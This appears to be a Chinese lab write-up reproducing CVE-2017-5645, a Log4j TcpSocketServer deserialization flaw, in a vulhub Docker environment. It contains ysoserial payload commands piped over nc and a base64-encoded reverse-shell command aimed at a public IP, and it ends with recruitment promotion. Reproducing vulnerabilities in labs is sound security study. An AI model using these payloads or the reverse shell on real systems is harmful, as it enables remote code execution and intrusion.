漏洞复现 | CVE‐2017‐5645

admin 2021年6月1日04:52:04评论142 views字数 1305阅读4分21秒阅读模式

本文作者:TaoingMs08067实验室 SRSP TEAM 核心成员)

漏洞复现 | CVE‐2017‐5645

 

Apache Log4j Server 反序列化命令执行漏洞(CVE‐2017‐5645)


一、漏洞原理 

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之 前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。


二、环境搭建
cd /vulhub/log4j/CVE‐2017‐5645       

#进入环境目录  

docker‐compose build && docker‐compose up ‐d   

#一键启动漏洞环境


环境启动后,将在4712端口开启一个TCPServer。 

漏洞复现 | CVE‐2017‐5645

除了使用vulhub的docker镜像搭建环境外,还下载了log4j的jar文件后可以直接在命令行启动这个 

TCPServer:java ‐cp "log4j‐api‐2.8.1.jar:log4j‐core‐2.8.1.jar:jcommander‐1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer

无需使用vulhub和编写代码。


三、漏洞复现 

payload 

使用ysoserial生成payload,然后直接发送给your‐ip:4712端口即可。 

java ‐jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE‐2017‐5645_is_succe ss" | nc your‐ip 4712


执行docker‐compose exec log4j bash进容器

可见 /tmp/CVE‐2017‐5645_is_success已成功创建:

漏洞复现 | CVE‐2017‐5645


四、反弹shell
工具推荐:
https://krober.biz/misc/reverse_shell.php   

#在线生成反弹shell命令  

http://www.jackson‐t.ca/runtime‐exec‐payloads.html   

#命令编码工具 


java ‐jar ysoserial.jar CommonsCollections5 "bash ‐c {echo,YmFzaCAtaSA+JiAvZGV 2L3RjcC84LjIxMC4yMzUuMjQ5Lzk5ODggMD4mMQ==}|{base64,‐d}|{bash,‐i}" | nc 8.210.1 52.234 4712 

漏洞复现 | CVE‐2017‐5645


shell到手 

漏洞复现 | CVE‐2017‐5645



参考文章:
https://www.cnblogs.com/zaqzzz/p/12459999.htm

https://xz.aliyun.com/t/1909




漏洞复现 | CVE‐2017‐5645

招新



微信联系方式:cos2606596924

满足以下要求均可尝试

1.至少会一门编程语言

2.漏洞平台上提交过漏洞超过20个

3.每月一文章分享(考虑有些要上班)‍





扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

漏洞复现 | CVE‐2017‐5645 漏洞复现 | CVE‐2017‐5645

漏洞复现 | CVE‐2017‐5645 漏洞复现 | CVE‐2017‐5645 漏洞复现 | CVE‐2017‐5645

目前30000+人已关注加入我们

漏洞复现 | CVE‐2017‐5645

本文始发于微信公众号(Ms08067安全实验室):漏洞复现 | CVE‐2017‐5645

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月1日04:52:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | CVE‐2017‐5645https://cn-sec.com/archives/292058.html

发表评论

匿名网友 填写信息